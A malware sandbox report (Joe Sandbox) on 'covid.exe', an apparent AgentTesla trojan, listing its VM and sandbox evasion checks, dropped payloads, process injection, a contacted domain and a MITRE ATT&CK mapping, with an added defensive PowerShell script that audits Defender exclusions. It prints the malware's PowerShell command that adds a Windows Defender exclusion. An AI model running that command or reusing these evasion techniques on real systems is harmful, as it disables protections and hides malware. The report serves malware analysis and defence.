Source: C:\Users\user\Desktop\covid.exe | File opened / queried: C:\WINDOWS\SysWOW64\drivers\vmmouse.sys
Source: C:\Users\user\Desktop\covid.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 name: Identifier
Source: C:\Users\user\Desktop\covid.exe | File opened / queried: C:\WINDOWS\SysWOW64\drivers\vmhgfs.sys
Source: C:\Users\user\Desktop\covid.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\covid.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\covid.exe | File opened / queried: C:\WINDOWS\SysWOW64\drivers\VBoxMouse.sys
Source: C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe | File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Users\user\Desktop\covid.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum name: 0
Source: C:\Users\user\Desktop\covid.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\covid.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4853
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2097
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5103
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2140
Source: C:\Users\user\Desktop\covid.exe TID: 5756 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\covid.exe TID: 5744 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6336 | Thread sleep count: 4853 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6472 | Thread sleep count: 52 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6340 | Thread sleep count: 2097 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6980 | Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6968 | Thread sleep time: -13835058055282155s >= -30000s
Source: C:\Users\user\Desktop\covid.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: powershell.exe, 00000010.00000003.423793477.0000000004F7B000.00000004.00000001.sdmp | Binary or memory string: Hyper-V
Source: powershell.exe, 00000010.00000003.423793477.0000000004F7B000.00000004.00000001.sdmp | Binary or memory string: l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
Source: covid.exe, 00000000.00000003.236324097.0000000005B2B000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW*L
Source: covid.exe, 00000000.00000003.236350637.0000000000C2F000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW
Source: AdvancedRun.exe, 00000005.00000002.281611272.0000000000628000.00000004.00000020.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe | Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe | Code function: 5_2_0040289F LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: C:\Users\user\Desktop\covid.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\covid.exe | Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

Adds a directory exclusion to Windows Defender
Source: C:\Users\user\Desktop\covid.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\covid.exe' -Force
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe | Code function: 5_2_00401C26 GetCurrentProcessId,memset,memset,_snwprintf,memset,ShellExecuteExW,WaitForSingleObject,GetExitCodeProcess,GetLastError
Source: C:\Users\user\Desktop\covid.exe | Process created: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\Desktop\covid.exe | Process created: C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe 'C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe' /EXEFilename 'C:\Users\user\Desktop\covid.exe' /WindowState ''1'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe | Process created: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe' /SpecialRun 4101d8 3192
Source: C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe | Process created: C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe 'C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe' /SpecialRun 4101d8 6224
Source: C:\Users\user\Desktop\covid.exe | Queries volume information: C:\Users\user\Desktop\covid.exe VolumeInformation
Source: C:\Users\user\Desktop\covid.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\covid.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\covid.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Users\user\Desktop\covid.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exeCode function: 5_2_0040A272 WriteProcessMemory,GetVersionExW,CreateRemoteThread,5_2_0040A272
Source: C:\Users\user\Desktop\covid.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
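Practitioner's check, added here and not part of the Joe Sandbox report: the rows above record powershell.exe children of covid.exe, the signature "Adds a directory exclusion to Windows Defender", and payloads dropped under C:\Users\user\AppData\Local\Temp\<guid>\. The PowerShell below audits the Defender exclusion list for entries that point at user-writable locations and pulls the Defender operational-log events (ID 5007, configuration changed) that record when an exclusion was written. It assumes a Windows 10 / Server 2016 or later host with the Defender cmdlets and is run elevated; the path patterns in $SuspiciousPrefixes and the extension list are the editor's assumptions and should be tuned to the environment.

```powershell
# Added example (not from the Joe Sandbox report): audit Microsoft Defender exclusions
# for entries that cover unprivileged-writable locations, the pattern used by droppers
# that stage payloads under %LOCALAPPDATA%\Temp and then run Add-MpPreference -ExclusionPath.
# Assumptions: Windows 10 / Server 2016+ with the Defender module; run from an elevated shell.

# Path patterns that should never appear as exclusions (assumption: tune per environment).
$SuspiciousPrefixes = @(
    '*\Users\*\AppData\Local\*',
    '*\Users\*\AppData\Roaming\*',
    '*\Users\*\Downloads\*',
    '*\Users\Public\*',
    '*\ProgramData\*',
    '*\Windows\Temp\*'
)

function Test-SuspiciousExclusion {
    param([Parameter(Mandatory)][string]$Path)
    # A whole-drive exclusion (C:\, D:) is as bad as a Temp exclusion.
    if ($Path -match '^[A-Za-z]:\\?$') { return $true }
    foreach ($pattern in $SuspiciousPrefixes) {
        if ($Path -like $pattern) { return $true }
    }
    return $false
}

function Get-DefenderExclusionReport {
    # Get-MpPreference exposes the three exclusion lists as string arrays (null when empty).
    $pref = Get-MpPreference
    foreach ($p in @($pref.ExclusionPath)) {
        if ([string]::IsNullOrEmpty($p)) { continue }
        [pscustomobject]@{ Kind = 'Path'; Value = $p; Suspicious = (Test-SuspiciousExclusion -Path $p) }
    }
    foreach ($p in @($pref.ExclusionProcess)) {
        if ([string]::IsNullOrEmpty($p)) { continue }
        # Process exclusions are keyed by image path, so the same path test applies.
        [pscustomobject]@{ Kind = 'Process'; Value = $p; Suspicious = (Test-SuspiciousExclusion -Path $p) }
    }
    foreach ($e in @($pref.ExclusionExtension)) {
        if ([string]::IsNullOrEmpty($e)) { continue }
        # Excluding executable or script extensions disables scanning wholesale (assumed list).
        [pscustomobject]@{ Kind = 'Extension'; Value = $e; Suspicious = ($e -match '^\.?(exe|dll|ps1|bat|cmd|vbs|js|scr)$') }
    }
}

function Get-RecentExclusionChanges {
    param([int]$Days = 7)
    # Event 5007 in the Defender operational log is "configuration has changed"; its message
    # carries the registry value written for a new exclusion (...\Exclusions\Paths\<path> = 0x0),
    # so filtering on "\Exclusions\" isolates exclusion additions and removals.
    $filter = @{
        LogName   = 'Microsoft-Windows-Windows Defender/Operational'
        Id        = 5007
        StartTime = (Get-Date).AddDays(-$Days)
    }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue |
        Where-Object { $_.Message -match '\\Exclusions\\' } |
        Select-Object TimeCreated,
            @{ n = 'Change'; e = { ($_.Message -split "`n" | Where-Object { $_ -match 'Exclusions' }) -join ' ' } }
}

$report = Get-DefenderExclusionReport
$report | Format-Table -AutoSize
$report | Where-Object Suspicious | ForEach-Object {
    Write-Warning "Suspicious Defender exclusion ($($_.Kind)): $($_.Value)"
}
# Thirty days covers the window in which a dropper like this one would have staged itself.
Get-RecentExclusionChanges -Days 30 | Format-Table -AutoSize -Wrap
```

The current exclusion list tells you what is covered now; the 5007 events tell you when it changed and from what, which is what ties an exclusion back to the process chain (here covid.exe to powershell.exe) that created it. A host where the exclusion has since been removed still shows the addition in the event log.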

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Windows Management Instrumentation 11 | Application Shimming 1 | Exploitation for Privilege Escalation 1 | Disable or Modify Tools 11 | OS Credential Dumping | File and Directory Discovery 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Native API 1 | Windows Service 1 | Application Shimming 1 | Deobfuscate/Decode Files or Information 1 | LSASS Memory | System Information Discovery 23 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Encrypted Channel 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | Command and Scripting Interpreter 1 | Logon Script (Windows) | Access Token Manipulation 1 | Obfuscated Files or Information 2 | Security Account Manager | Query Registry 1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | Service Execution 2 | Logon Script (Mac) | Windows Service 1 | Timestomp 1 | NTDS | Security Software Discovery 121 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 2 | SIM Card Swap | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Process Injection 11 | Masquerading 1 | LSA Secrets | Virtualization/Sandbox Evasion 141 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Virtualization/Sandbox Evasion 141 | Cached Domain Credentials | Process Discovery 2 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Access Token Manipulation 1 | DCSync | Application Window Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Process Injection 11 | Proc Filesystem | Remote System Discovery 1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue

Behavior Graph

Behavior Graph ID: 393947 | Sample: covid.exe | Start date: 20/04/2021 | Architecture: WINDOWS | Score: 68

Sample-level signatures:

  • Multi AV Scanner detection for domain / URL
  • Multi AV Scanner detection for submitted file
  • Machine Learning detection for sample

Process tree and artifacts (reconstructed from the graph's node and edge list):

  • covid.exe (started)
      • contacts mmwrlridbhmibnr.ml, 172.67.220.147, 49702, 80, CLOUDFLARENETUS, United States
      • drops C:\Users\user\AppData\Local\...\covid.exe.log (ASCII)
      • drops 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe (PE32)
      • drops C:\Users\user\AppData\...\AdvancedRun.exe (PE32)
      • signature: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
      • signature: Adds a directory exclusion to Windows Defender
      • starts AdvancedRun.exe
          • starts AdvancedRun.exe, which contacts 192.168.2.1 (unknown, unknown)
      • starts powershell.exe, which starts conhost.exe
      • starts powershell.exe, which starts conhost.exe
      • starts 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe, which starts 41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
covid.exe | 41% | Virustotal | -
covid.exe | 9% | Metadefender | -
covid.exe | 34% | ReversingLabs | Win32.Trojan.AgentTesla
covid.exe | 100% | Joe Sandbox ML | -

Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe | 3% | Metadefender | -
C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe | 0% | ReversingLabs | -
C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe | 3% | Metadefender | -
C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe | 0% | ReversingLabs | -

Unpacked PE Files

Source | Detection | Scanner | Label
0.0.covid.exe.460000.0.unpack | 100% | Avira | HEUR/AGEN.1101074

Domains

Source | Detection | Scanner | Label
mmwrlridbhmibnr.ml | 5% | Virustotal | -

URLs

Source | Detection | Scanner | Label
https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s458/0_GettyImages-1304940818. | 0% | URL Reputation | safe
https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s458/1_FreeAgentPlayers.jpg | 0% | URL Reputation | safe
https://www.liverpool.com/liverpool-fc-news/features/liverpool-arsenal-klopp-lijnders-carabao-171668 | 0% | URL Reputation | safe
https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-02- | 0% | URL Reputation | safe
https://i2-prod.liverpoolecho.co.uk/incoming/article17165318.ece/ALTERNATES/s615/2_GettyImages-11837 | 0% | URL Reputation | safe
https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s220b/0_GettyImages-1273716690 | 0% | URL Reputation | safe
https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s180/0_GettyImages-1302496803. | 0% | URL Reputation | safe
https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s270b/0_Salah-Goal-vs-Leeds.jp | 0% | URL Reputation | safe
https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03- | 0% | URL Reputation | safe
https://www.liverpool.com/all-about/premier-league | 0% | URL Reputation | safe
https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s180/0_Salah-Pressing.jpg | 0% | URL Reputation | safe
https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s615/0_Curtis-10.png | 0% | URL Reputation | safe
https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s180/1_WhatsApp-Image-2021-03- | 0% | URL Reputation | safe
https://www.liverpool.com/liverpool-fc-news/ | 0% | URL Reputation | safe
https://www.liverpool.com/schedule/liverpool-arsenal-carabao-cup-klopp-17166154 | 0% | URL Reputation | safe
https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s615/0_GettyImages-1231353837. | 0% | URL Reputation | safe
https://www.liverpool.com/liverpool-fc-news/features/liverpool-psg-transfer-news-19957850 | 0% | URL Reputation | safe
https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s220b/0_WhatsApp-Image-2021-02 | 0% | URL Reputation | safe
https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s180/0_RobertsonCross1.jpg | 0% | URL Reputation | safe
https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s270b/0_Curtis-10.png | 0% | URL Reputation | safe
https://www.liverpool.com/liverpool-fc-news/transfer-news/fsg-liverpool-gini-wijnaldum-transfer-1876 | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s615/0_RobertsonCross1.jpg | 0% | URL Reputation | safe
https://www.liverpool.com/liverpool-fc-news/features/jurgen-klopp-liverpool-transfer-targets-1996166 | 0% | URL Reputation | safe
https://www.liverpool.com/liverpool-fc-news/transfer-news/liverpool-erling-haaland-transfer-weghorst | 0% | URL Reputation | safe

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
mmwrlridbhmibnr.ml | 172.67.220.147 | true | false | - | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://mmwrlridbhmibnr.ml/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-A70E3BA9C56C3F44E5DAA4E51EAD00CB.html | true | 8%, Virustotal; Avira URL Cloud: safe | unknown
http://mmwrlridbhmibnr.ml/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-8D0E09CE9EC742EC93B6C666F9ACD863.html | false | Avira URL Cloud: safe | unknown

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s458/0_GettyImages-1304940818. | covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s458/1_FreeAgentPlayers.jpg | covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://c.amazon-adsystem.com/aax2/apstag.js | covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp | false | - | high
https://www.liverpool.com/liverpool-fc-news/features/liverpool-arsenal-klopp-lijnders-carabao-171668 | covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-02- | covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://i2-prod.liverpoolecho.co.uk/incoming/article17165318.ece/ALTERNATES/s615/2_GettyImages-11837 | covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
